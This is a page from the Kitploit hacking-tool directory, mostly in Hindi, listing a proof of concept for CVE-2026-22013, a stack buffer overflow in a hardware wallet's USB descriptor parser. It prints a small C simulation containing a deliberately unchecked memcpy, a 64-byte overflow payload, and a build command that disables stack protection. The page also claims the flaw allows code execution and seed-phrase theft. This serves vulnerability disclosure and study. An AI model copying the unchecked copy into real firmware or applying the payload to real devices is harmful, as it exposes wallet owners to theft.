Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — हार्डवेयर वॉलेट USB डिस्क्रिप्टर पार्सर के लिए स्टैक बफर ओवरफ्लो PoC (CVE-2026-22013), जो अत्यधिक बड़े GET_DESCRIPTOR पेलोड के माध्यम से रिटर्न-एड्रेस ओवरराइट और कोड निष्पादन दर्शाता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणहार्डवेयर हैकिंगहार्डवेयर सुरक्षाबाइनरी शोषण
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

हार्डवेयर वॉलेट USB डिस्क्रिप्टर पार्सर के लिए स्टैक बफर ओवरफ्लो PoC (CVE-2026-22013), जो अत्यधिक बड़े GET_DESCRIPTOR पेलोड के माध्यम से रिटर्न-एड्रेस ओवरराइट और कोड निष्पादन दर्शाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
16 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-22013 – हार्डवेयर वॉलेट USB डिस्क्रिप्टर बफर ओवरफ़्लो

प्रोग्राम कोड (C फ़र्मवेयर सिम)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – हार्डवेयर वॉलेट USB डिस्क्रिप्टर बफर ओवरफ़्लो

Severity: Critical

अवलोकन

हार्डवेयर वॉलेट के USB स्टैक में GET_DESCRIPTOR अनुरोध को अत्यधिक बड़े पेलोड के साथ पार्स करते समय स्टैक बफर ओवरफ़्लो होता है। भौतिक USB पहुंच रखने वाला हमलावर रिटर्न एड्रेस को अधिलेखित करने और कोड निष्पादन प्राप्त करने के लिए इसका शोषण कर सकता है, जिससे सीड वाक्यांश निकाले जा सकते हैं।

भेद्यता विवरण

  • प्रकार: स्टैक बफर ओवरफ़्लो
  • प्रभाव: डिवाइस का पूर्ण समझौता, सीड निष्कर्षण।
  • मूल कारण: डिस्क्रिप्टर लंबाई फ़ील्ड को निश्चित आकार के बफर में कॉपी करने से पहले मान्य नहीं किया जाता है।

शोषण प्रदर्शन

लक्ष्य आर्किटेक्चर के लिए कंपाइल करें और चलाएँ (सिमुलेट):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

स्टैक भ्रष्टाचार के कारण प्रोग्राम क्रैश हो जाता है।

टूल डाउनलोड करें